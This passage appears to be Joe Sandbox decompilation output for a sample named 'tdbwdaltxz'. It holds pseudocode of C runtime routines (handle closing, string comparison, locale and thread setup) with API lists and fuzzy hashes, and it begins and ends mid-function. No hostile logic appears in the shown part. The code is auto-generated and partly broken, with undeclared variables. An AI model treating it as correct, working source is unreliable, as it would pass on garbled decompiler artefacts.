                        				if(_t13 >= 0) {
                        					_t35 = _a4;
                        					if(E01070E34(_t35) == 0xffffffff) {
                        						L10:
                        						_t40 = 0;
                        					} else {
                        						_t18 =  *0x1081c60; // 0xbb2cd8
                        						if(_t35 != 1 || ( *(_t18 + 0x84) & 0x00000001) == 0) {
                        							if(_t35 != 2 || ( *(_t18 + 0x44) & 0x00000001) == 0) {
                        								goto L8;
                        							} else {
                        								goto L7;
                        							}
                        						} else {
                        							L7:
                        							_t22 = E01070E34(2);
                        							if(E01070E34(1) == _t22) {
                        								goto L10;
                        							} else {
                        								L8:
                        								if(CloseHandle(E01070E34(_t35)) != 0) {
                        									goto L10;
                        								} else {
                        									_t40 = GetLastError();
                        								}
                        							}
                        						}
                        					}
                        					E01070DAE(_t35);
                        					 *((char*)( *((intOrPtr*)(0x1081c60 + (_t35 >> 5) * 4)) + ((_t35 & 0x0000001f) << 6) + 4)) = 0;
                        					if(_t40 == 0) {
                        						_t16 = 0;
                        					} else {
                        						_t16 = E010647AB(_t40) | 0xffffffff;
                        					}
                        					return _t16;
                        				} else {
                        					return _t13 | 0xffffffff;
                        				}
                        			}

                        APIs
                        • __ioinit.LIBCMT ref: 01072800
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        • __get_osfhandle.LIBCMT ref: 01072814
                        • __get_osfhandle.LIBCMT ref: 0107283F
                        • __get_osfhandle.LIBCMT ref: 01072848
                        • __get_osfhandle.LIBCMT ref: 01072854
                        • CloseHandle.KERNEL32(00000000,?,00000000,?,01071CC9,?,?,?,?,?,?,?,?,01061DA1,00000000,00000109), ref: 0107285B
                        • GetLastError.KERNEL32(?,01071CC9,?,?,?,?,?,?,?,?,01061DA1,00000000,00000109), ref: 01072865
                        • __free_osfhnd.LIBCMT ref: 01072872
                        • __dosmaperr.LIBCMT ref: 01072894
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __get_osfhandle$Once$CloseErrorExecuteHandleInitLast__dosmaperr__free_osfhnd__ioinit
                        • String ID:
                        • API String ID: 974577687-0
                        • Opcode ID: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction ID: 9fef578164fdaac27f12ba87d1b6efbd86cbd04ca8f238af5d800b99a46bf208
                        • Opcode Fuzzy Hash: ed8b67492e3c42d3590f289d0681df3fd925fee0d1afcbd47e5e752ab5e75256
                        • Instruction Fuzzy Hash: 4D114C32E0721405D2E1227CA8447BE7B895FA2B34F15039DF9E9D71CADA77E881C358
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E010619F0(WCHAR* _a4, char* _a8) {
                        				int _t11;
                        				int _t18;
                        				void* _t26;
                        				int _t28;
                        
                        				_t28 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                        				if(_t28 != 0) {
                        					_t11 = lstrlenW(_a4);
                        					_t3 = _t28 - 1; // -1
                        					if(_t11 < _t3) {
                        						goto L1;
                        					} else {
                        						_t26 = HeapAlloc(GetProcessHeap(), 0, _t28 + _t28);
                        						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t26, _t28);
                        						_t6 = _t28 - 1; // -1
                        						_t18 = CompareStringW(GetThreadLocale(), 1, _a4, _t6, _t26, _t6);
                        						HeapFree(GetProcessHeap(), 0, _t26);
                        						return 0 | _t18 == 0x00000002;
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A01
                        • lstrlenW.KERNEL32(?), ref: 01061A17
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A2B
                        • HeapAlloc.KERNEL32(00000000), ref: 01061A32
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061A45
                        • GetThreadLocale.KERNEL32(00000001,?,-00000001,00000000,-00000001), ref: 01061A56
                        • CompareStringW.KERNEL32(00000000), ref: 01061A5D
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061A68
                        • HeapFree.KERNEL32(00000000), ref: 01061A6F
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction ID: 50280af81effd8d66e6d83fbd8a61d2c07757c83eaa4250eec8d050b21c0e330
                        • Opcode Fuzzy Hash: 8a44a3cfc130ae6e0d3971429a61a1c5afb9823e3839bf1964925b9c7876fa39
                        • Instruction Fuzzy Hash: 20118072944215BBDB321BB4EC0DF9B7B6DEB48762F104614F7A5EA0C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061960(WCHAR* _a4, char* _a8) {
                        				int _t10;
                        				int _t17;
                        				void* _t24;
                        				int _t26;
                        
                        				_t26 = MultiByteToWideChar(0, 0, _a8, 0xffffffff, 0, 0);
                        				if(_t26 != 0) {
                        					_t10 = lstrlenW(_a4);
                        					_t3 = _t26 - 1; // -1
                        					if(_t10 != _t3) {
                        						goto L1;
                        					} else {
                        						_t24 = HeapAlloc(GetProcessHeap(), 0, _t26 + _t26);
                        						MultiByteToWideChar(0, 0, _a8, 0xffffffff, _t24, _t26);
                        						_t17 = CompareStringW(GetThreadLocale(), 1, _a4, _t26, _t24, _t26);
                        						HeapFree(GetProcessHeap(), 0, _t24);
                        						return 0 | _t17 == 0x00000002;
                        					}
                        				} else {
                        					L1:
                        					return 0;
                        				}
                        			}

                        APIs
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 01061971
                        • lstrlenW.KERNEL32(?), ref: 01061987
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 0106199B
                        • HeapAlloc.KERNEL32(00000000), ref: 010619A2
                        • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,00000000,00000000), ref: 010619B5
                        • GetThreadLocale.KERNEL32(00000001,?,00000000,00000000,00000000), ref: 010619C3
                        • CompareStringW.KERNEL32(00000000), ref: 010619CA
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 010619D5
                        • HeapFree.KERNEL32(00000000), ref: 010619DC
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$ByteCharMultiProcessWide$AllocCompareFreeLocaleStringThreadlstrlen
                        • String ID:
                        • API String ID: 3897715424-0
                        • Opcode ID: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction ID: 888bccb101bcd1cd35b9d403740cb586c337398a57f3fe73a3903366a2ceca2a
                        • Opcode Fuzzy Hash: 562e6d8e362c46715b4fa1c9f3be890b228a2c909332fc93da3198dfd52f9f21
                        • Instruction Fuzzy Hash: 05014032944214BBDB321BB4AC0DF9B7F6DEF45761F104611F6A5EA1C4DA769400CBE0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E01061490(WCHAR* _a4) {
                        				signed int _v8;
                        				void* _v12;
                        				int _t16;
                        				void* _t19;
                        				long _t21;
                        				signed int _t28;
                        				long _t36;
                        				void* _t37;
                        				void* _t39;
                        				void* _t45;
                        				WCHAR* _t47;
                        				void* _t48;
                        				long _t51;
                        				long _t52;
                        				void* _t53;
                        				short* _t54;
                        				long _t55;
                        				void* _t57;
                        				void* _t58;
                        
                        				_t36 = _a4;
                        				if(_t36 != 0) {
                        					_t39 = 1;
                        					_t51 = _t36;
                        					do {
                        						_t16 = lstrlenW(_t51 + 4);
                        						_t51 =  *_t51;
                        						_t39 = _t39 + 3 + _t16;
                        						__eflags = _t51;
                        					} while (_t51 != 0);
                        					_t19 = HeapAlloc(GetProcessHeap(), _t51, _t39 + _t39);
                        					_v12 = _t19;
                        					_t52 = _t19;
                        					do {
                        						_push(0x3d);
                        						_push(_t36 + 4);
                        						_t21 = E01062AA0(_t37);
                        						_t57 = _t57 + 8;
                        						_a4 = _t21;
                        						__eflags = _t21;
                        						if(_t21 != 0) {
                        							 *_t52 = 0x20;
                        							_t45 = (_t21 - _t36 - 4 >> 1) + (_t21 - _t36 - 4 >> 1);
                        							_t53 = _t52 + 2;
                        							E01063C60(_t53, _t36 + 4, _t45);
                        							_t54 = _t53 + _t45;
                        							_t47 =  &(_a4[1]);
                        							_push(0x20);
                        							 *_t54 = 0x3d;
                        							_push(_t47);
                        							_t55 = _t54 + 2;
                        							__eflags = _t55;
                        							_a4 = _t47;
                        							_t28 = E01062AA0(_t37);
                        							_t58 = _t57 + 0x14;
                        							asm("sbb eax, eax");
                        							_v8 =  ~( ~_t28);
                        							if(__eflags != 0) {
                        								 *_t55 = 0x22;
                        								_t55 = _t55 + 2;
                        								__eflags = _t55;
                        							}
                        							_t48 = lstrlenW(_t47) + _t31;
                        							E01063C60(_t55, _a4, _t48);
                        							_t57 = _t58 + 0xc;
                        							_t52 = _t55 + _t48;
                        							__eflags = _v8;
                        							if(_v8 != 0) {
                        								 *_t52 = 0x22;
                        								_t52 = _t52 + 2;
                        								__eflags = _t52;
                        							}
                        						}
                        						_t36 =  *_t36;
                        						__eflags = _t36;
                        					} while (_t36 != 0);
                        					__eflags = 0;
                        					 *_t52 = 0;
                        					return _v12;
                        				} else {
                        					return 0;
                        				}
                        			}























                        APIs
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap_memmove_wcschrlstrlen$AllocProcess
                        • String ID:
                        • API String ID: 3798481777-0
                        • Opcode ID: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction ID: 24ac637c953df66061c31803499ca73fe0b039d984d21936afe607a96081f0be
                        • Opcode Fuzzy Hash: cdaa6f93d190887152064542bbd4df7bd5c97cdfc5b8ef9162fe5acf01b877e5
                        • Instruction Fuzzy Hash: 6831E577D00206EBD7319F68DC84A9AB7FCAFA4350F15416AED89EB240E635D90187D1
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E010753D9(void* __ebx, void* __edi, void* __esi, void* __eflags) {
                        				void* _t11;
                        				intOrPtr* _t17;
                        				intOrPtr* _t31;
                        				void* _t32;
                        
                        				_push(8);
                        				_push(0x107e500);
                        				_t11 = E010668F0(__ebx, __edi, __esi);
                        				_t31 =  *((intOrPtr*)(_t32 + 8));
                        				if(_t31 != 0) {
                        					E01064D39(0xd);
                        					 *(_t32 - 4) =  *(_t32 - 4) & 0x00000000;
                        					if( *(_t31 + 4) != 0 && InterlockedDecrement( *(_t31 + 4)) == 0 &&  *(_t31 + 4) != 0x10809a8) {
                        						E01064ED2( *(_t31 + 4));
                        					}
                        					 *(_t32 - 4) = 0xfffffffe;
                        					E010759E9();
                        					if( *_t31 != 0) {
                        						E01064D39(0xc);
                        						 *(_t32 - 4) = 1;
                        						E0107024B( *_t31);
                        						_t17 =  *_t31;
                        						if(_t17 != 0 &&  *_t17 == 0 && _t17 != 0x1080d40) {
                        							E010700F1(_t17);
                        						}
                        						 *(_t32 - 4) = 0xfffffffe;
                        						E010759F5();
                        					}
                        					_t11 = E01064ED2(_t31);
                        				}
                        				return E01066935(_t11);
                        			}








                        APIs
                        • __lock.LIBCMT ref: 0107595D
                          • Part of subcall function 01064D39: __mtinitlocknum.LIBCMT ref: 01064D4B
                          • Part of subcall function 01064D39: __amsg_exit.LIBCMT ref: 01064D57
                          • Part of subcall function 01064D39: EnterCriticalSection.KERNEL32(?,?,0106B376,0000000D), ref: 01064D64
                        • InterlockedDecrement.KERNEL32(00000000), ref: 01075970
                        • _free.LIBCMT ref: 01075986
                          • Part of subcall function 01064ED2: HeapFree.KERNEL32(00000000,00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EE6
                          • Part of subcall function 01064ED2: GetLastError.KERNEL32(00000000,?,0106B325,00000000,01062F8B,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 01064EF8
                        • __lock.LIBCMT ref: 0107599F
                        • ___removelocaleref.LIBCMT ref: 010759AE
                        • ___freetlocinfo.LIBCMT ref: 010759C7
                        • _free.LIBCMT ref: 010759DA
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: __lock_free$CriticalDecrementEnterErrorFreeHeapInterlockedLastSection___freetlocinfo___removelocaleref__amsg_exit__mtinitlocknum
                        • String ID:
                        • API String ID: 556454624-0
                        • Opcode ID: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction ID: d23acd6f19b6c5fbd4e6a06fcf96036428ffa507910a50b814e5d6cf4224118c
                        • Opcode Fuzzy Hash: dcc7d24a435e672b7c68f2bee225c09b63b7d6e9a53b4f6580b2ad8de36ebc59
                        • Instruction Fuzzy Hash: A6018031D01702EAEBB57F68DC057DD7AE46F12730F20469DF1D8AA0D0DB749580C619
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 91%
                        			E0106B3E0(void* __ebx, void* __edi) {
                        				void* __esi;
                        				void* _t3;
                        				intOrPtr _t6;
                        				long _t14;
                        				long* _t27;
                        
                        				E010653AC(_t3);
                        				if(E01064E88() != 0) {
                        					_t6 = E0106BBB1(_t5, E0106B140);
                        					 *0x1080670 = _t6;
                        					__eflags = _t6 - 0xffffffff;
                        					if(_t6 == 0xffffffff) {
                        						goto L1;
                        					} else {
                        						_t27 = E01064F0A(1, 0x3b8);
                        						__eflags = _t27;
                        						if(_t27 == 0) {
                        							L6:
                        							E0106B456();
                        							__eflags = 0;
                        							return 0;
                        						} else {
                        							__eflags = E0106BBDB(_t9,  *0x1080670, _t27);
                        							if(__eflags == 0) {
                        								goto L6;
                        							} else {
                        								_push(0);
                        								_push(_t27);
                        								E0106B334(__ebx, __edi, _t27, __eflags);
                        								_t14 = GetCurrentThreadId();
                        								_t27[1] = _t27[1] | 0xffffffff;
                        								 *_t27 = _t14;
                        								__eflags = 1;
                        								return 1;
                        							}
                        						}
                        					}
                        				} else {
                        					L1:
                        					E0106B456();
                        					return 0;
                        				}
                        			}









                        APIs
                        • __init_pointers.LIBCMT ref: 0106B3E0
                          • Part of subcall function 010653AC: RtlEncodePointer.NTDLL(00000000,?,0106B3E5,0106431E,0107DFD8,00000014), ref: 010653AF
                          • Part of subcall function 010653AC: __initp_misc_winsig.LIBCMT ref: 010653D0
                        • __mtinitlocks.LIBCMT ref: 0106B3E5
                          • Part of subcall function 01064E88: InitializeCriticalSectionAndSpinCount.KERNEL32(010803F8,00000FA0,?,?,0106B3EA,0106431E,0107DFD8,00000014), ref: 01064EA6
                        • __mtterm.LIBCMT ref: 0106B3EE
                        • __calloc_crt.LIBCMT ref: 0106B413
                        • __initptd.LIBCMT ref: 0106B435
                        • GetCurrentThreadId.KERNEL32 ref: 0106B43C
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: CountCriticalCurrentEncodeInitializePointerSectionSpinThread__calloc_crt__init_pointers__initp_misc_winsig__initptd__mtinitlocks__mtterm
                        • String ID:
                        • API String ID: 2211675822-0
                        • Opcode ID: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction ID: 7789b4e8aa9c632ad8694f532c391716a801157ad41010afb9af6e60e1eb202e
                        • Opcode Fuzzy Hash: cbf9d27e79999a317173a0e713e8020ad2be0268aa6f239349e5c38e0918410f
                        • Instruction Fuzzy Hash: CAF090B27497239AE7B43B387C06ADA3ACCDF21635F204A5AF8D4D50C4EF6184428254
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 100%
                        			E01061A90(void* __eflags, signed int _a4, long* _a8, long* _a12) {
                        				void* _t21;
                        				int _t22;
                        				void* _t26;
                        				signed int _t27;
                        				long _t29;
                        				signed int _t30;
                        				long* _t31;
                        				signed int _t32;
                        				WCHAR* _t35;
                        				long _t36;
                        				signed int _t40;
                        				void* _t42;
                        
                        				_t35 = _a4;
                        				 *_a8 = 0;
                        				 *_a12 = 0;
                        				_t21 = E01061640(_t35, 0);
                        				_t22 = lstrlenW(_t35);
                        				_t26 = HeapAlloc(GetProcessHeap(), 0, 2 + (_t22 + _t21) * 2);
                        				_t42 = _t26;
                        				if(_t42 == 0) {
                        					return _t26;
                        				} else {
                        					_t27 = E01061640(_t35, _t42);
                        					_a4 = _t27;
                        					_t29 = HeapAlloc(GetProcessHeap(), 0, 4 + _t27 * 4);
                        					_t36 = _t29;
                        					if(_t36 != 0) {
                        						_t30 = _a4;
                        						_t40 = 0;
                        						if(_t30 <= 0) {
                        							L6:
                        							 *(_t36 + _t40 * 4) = 0;
                        							 *_a8 = _t30;
                        							_t31 = _a12;
                        							 *_t31 = _t36;
                        							return _t31;
                        						}
                        						do {
                        							 *(_t36 + _t40 * 4) = _t42;
                        							_t32 = lstrlenW(_t42);
                        							_t30 = _a4;
                        							_t40 = _t40 + 1;
                        							_t42 = _t42 + _t32 * 2 + 2;
                        						} while (_t40 < _t30);
                        						goto L6;
                        					}
                        					return HeapFree(GetProcessHeap(), _t29, _t42);
                        				}
                        			}
















                        APIs
                        • lstrlenW.KERNEL32(?), ref: 01061AB6
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061ACE
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AD1
                        • GetProcessHeap.KERNEL32(00000000), ref: 01061AF1
                        • HeapAlloc.KERNEL32(00000000), ref: 01061AF4
                        • GetProcessHeap.KERNEL32(00000000,00000000), ref: 01061B02
                        • HeapFree.KERNEL32(00000000), ref: 01061B05
                        • lstrlenW.KERNEL32(00000000), ref: 01061B24
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Heap$Process$Alloclstrlen$Free
                        • String ID:
                        • API String ID: 1242203261-0
                        • Opcode ID: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction ID: c20c9f97517295658b83cd62faf7575040e2e70fe348ae006dd91f9ee83db3b5
                        • Opcode Fuzzy Hash: 48eba48b9f8cc5c384709479db6d853e69b72b6ba9a75d6894c67b37ac32f9de
                        • Instruction Fuzzy Hash: FB2151B6600219ABD7219F69EC88F9F7BACEF89350F014011FA45DB214D635E900CBA0
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E01074BD2(void* __ecx, void* __eflags, signed short _a4, signed int* _a8) {
                        				signed int _v8;
                        				char _v12;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t45;
                        				signed int _t46;
                        				signed int _t47;
                        				signed int _t50;
                        				signed int _t53;
                        				signed int _t54;
                        				signed int _t59;
                        				void* _t64;
                        				signed int _t66;
                        				void* _t68;
                        				signed int _t75;
                        				signed int _t79;
                        				signed short _t80;
                        				signed int _t82;
                        				void* _t83;
                        				signed int _t90;
                        				void* _t91;
                        				signed int _t92;
                        				signed int _t94;
                        				signed int* _t97;
                        
                        				_t46 = E01066594(_t45);
                        				if(_t46 >= 0) {
                        					_t97 = _a8;
                        					_t47 = E01065573(_t97);
                        					_t79 = _t97[3];
                        					_t94 = _t47;
                        					__eflags = _t79 & 0x00000082;
                        					if(__eflags != 0) {
                        						__eflags = _t79 & 0x00000040;
                        						if(__eflags == 0) {
                        							_t75 = 0;
                        							__eflags = _t79 & 0x00000001;
                        							if((_t79 & 0x00000001) == 0) {
                        								L10:
                        								_t50 = _t97[3] & 0xffffffef | 0x00000002;
                        								_t97[3] = _t50;
                        								_t97[1] = _t75;
                        								__eflags = _t50 & 0x0000010c;
                        								if((_t50 & 0x0000010c) == 0) {
                        									_t64 = E01062E24();
                        									__eflags = _t97 - _t64 + 0x20;
                        									if(_t97 == _t64 + 0x20) {
                        										L13:
                        										_t66 = E0106FFFD(_t94);
                        										__eflags = _t66;
                        										if(_t66 == 0) {
                        											goto L14;
                        										}
                        									} else {
                        										_t68 = E01062E24();
                        										__eflags = _t97 - _t68 + 0x40;
                        										if(_t97 != _t68 + 0x40) {
                        											L14:
                        											E01070A65(_t97);
                        										} else {
                        											goto L13;
                        										}
                        									}
                        								}
                        								__eflags = _t97[3] & 0x00000108;
                        								if(__eflags == 0) {
                        									_v12 = _a4;
                        									_push(2);
                        									_push( &_v12);
                        									_push(_t94);
                        									_v8 = 2;
                        									_t53 = E0106BEF0(_t75, _t91, _t94, _t97, __eflags);
                        									_t80 = _a4;
                        									_t75 = _t53;
                        									goto L27;
                        								} else {
                        									_t92 = _t97[2];
                        									 *_t97 = _t92 + 2;
                        									_t82 =  *_t97 - _t92;
                        									_v8 = _t82;
                        									_t97[1] = _t97[6] - 2;
                        									__eflags = _t82;
                        									if(__eflags <= 0) {
                        										__eflags = _t94 - 0xffffffff;
                        										if(_t94 == 0xffffffff) {
                        											L22:
                        											_t83 = 0x1080520;
                        										} else {
                        											__eflags = _t94 - 0xfffffffe;
                        											if(_t94 == 0xfffffffe) {
                        												goto L22;
                        											} else {
                        												_t83 = ((_t94 & 0x0000001f) << 6) +  *((intOrPtr*)(0x1081c60 + (_t94 >> 5) * 4));
                        											}
                        										}
                        										__eflags =  *(_t83 + 4) & 0x00000020;
                        										if(__eflags == 0) {
                        											goto L25;
                        										} else {
                        											_push(2);
                        											_push(_t75);
                        											_push(_t75);
                        											_push(_t94);
                        											_t59 = E01067780(_t75, _t94, _t97, __eflags);
                        											__eflags = (_t59 & _t92) - 0xffffffff;
                        											if((_t59 & _t92) == 0xffffffff) {
                        												goto L28;
                        											} else {
                        												goto L25;
                        											}
                        										}
                        									} else {
                        										_push(_t82);
                        										_push(_t92);
                        										_push(_t94);
                        										_t75 = E0106BEF0(_t75, _t92, _t94, _t97, __eflags);
                        										L25:
                        										_t80 = _a4;
                        										 *(_t97[2]) = _t80;
                        										L27:
                        										__eflags = _t75 - _v8;
                        										if(_t75 == _v8) {
                        											_t54 = _t80 & 0x0000ffff;
                        										} else {
                        											L28:
                        											_t43 =  &(_t97[3]);
                        											 *_t43 = _t97[3] | 0x00000020;
                        											__eflags =  *_t43;
                        											goto L29;
                        										}
                        									}
                        								}
                        							} else {
                        								_t97[1] = 0;
                        								__eflags = _t79 & 0x00000010;
                        								if((_t79 & 0x00000010) == 0) {
                        									_t97[3] = _t79 | 0x00000020;
                        									L29:
                        									_t54 = 0xffff;
                        								} else {
                        									_t90 = _t79 & 0xfffffffe;
                        									__eflags = _t90;
                        									 *_t97 = _t97[2];
                        									_t97[3] = _t90;
                        									goto L10;
                        								}
                        							}
                        						} else {
                        							 *((intOrPtr*)(E010647CC(__eflags))) = 0x22;
                        							goto L6;
                        						}
                        					} else {
                        						 *((intOrPtr*)(E010647CC(__eflags))) = 9;
                        						L6:
                        						_t97[3] = _t97[3] | 0x00000020;
                        						_t54 = 0xffff;
                        					}
                        					return _t54;
                        				} else {
                        					return _t46 | 0xffffffff;
                        				}
                        			}

                        APIs
                        • __ioinit.LIBCMT ref: 01074BD7
                          • Part of subcall function 01066594: InitOnceExecuteOnce.KERNEL32(01081050,010665CF,00000000,00000000,01062FAF,0107DF38,0000000C,01062084,-00000040,Unknown option "%c" in Repair mode), ref: 010665A2
                        Memory Dump Source
                        • Source File: 00000001.00000002.262337236.0000000001061000.00000020.00000001.01000000.00000004.sdmp, Offset: 01060000, based on PE: true
                        • Associated: 00000001.00000002.262327441.0000000001060000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262470519.000000000107B000.00000002.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262489901.0000000001080000.00000004.00000001.01000000.00000004.sdmp
                        • Associated: 00000001.00000002.262501569.0000000001083000.00000002.00000001.01000000.00000004.sdmp
                        Joe Sandbox IDA Plugin
                        • Snapshot File: hcaresult_1_2_1060000_tdbwdaltxz.jbxd
                        Similarity
                        • API ID: Once$ExecuteInit__ioinit
                        • String ID:
                        • API String ID: 129814473-0
                        • Opcode ID: e0f898912dc74ef25ecc3fa0492e44df95631676b5c13e5c07da1bfa3a2d9e93
                        • Instruction ID: 1610157736473a1e1fae61af9aeaa4d07d59c8a1a30f03a90ba830bb9c5c767e
                        • Opcode Fuzzy Hash: e0f898912dc74ef25ecc3fa0492e44df95631676b5c13e5c07da1bfa3a2d9e93
                        • Instruction Fuzzy Hash: 74416871E0070A9FE7749F6CC881ABA7BE8AF41320F00866DE5E6C76C1D774D8008B18
                        Uniqueness

                        Uniqueness Score: -1.00%

                        C-Code - Quality: 88%
                        			E0106793B(void* __eflags, signed char _a4, signed int* _a8) {
                        				signed int _v8;
                        				void* __ebx;
                        				void* __edi;
                        				void* __esi;
                        				void* __ebp;
                        				void* _t43;
                        				signed int _t44;
                        				signed int _t45;
                        				signed int _t48;
                        				signed int _t52;
                        				void* _t60;
                        				signed int _t62;
                        				void* _t64;
                        				signed int _t67;
                        				signed int _t70;
                        				signed int _t74;
                        				signed int _t76;
                        				void* _t77;
                        				signed int _t85;
                        				void* _t86;
                        				signed int _t87;
                        				signed int _t89;
                        				signed int* _t92;
                        
                        				_t44 = E01066594(_t43);
                        				if(_t44 >= 0) {
                        					_t92 = _a8;
                        					_t45 = E01065573(_t92);
                        					_t74 = _t92[3];
                        					_t89 = _t45;
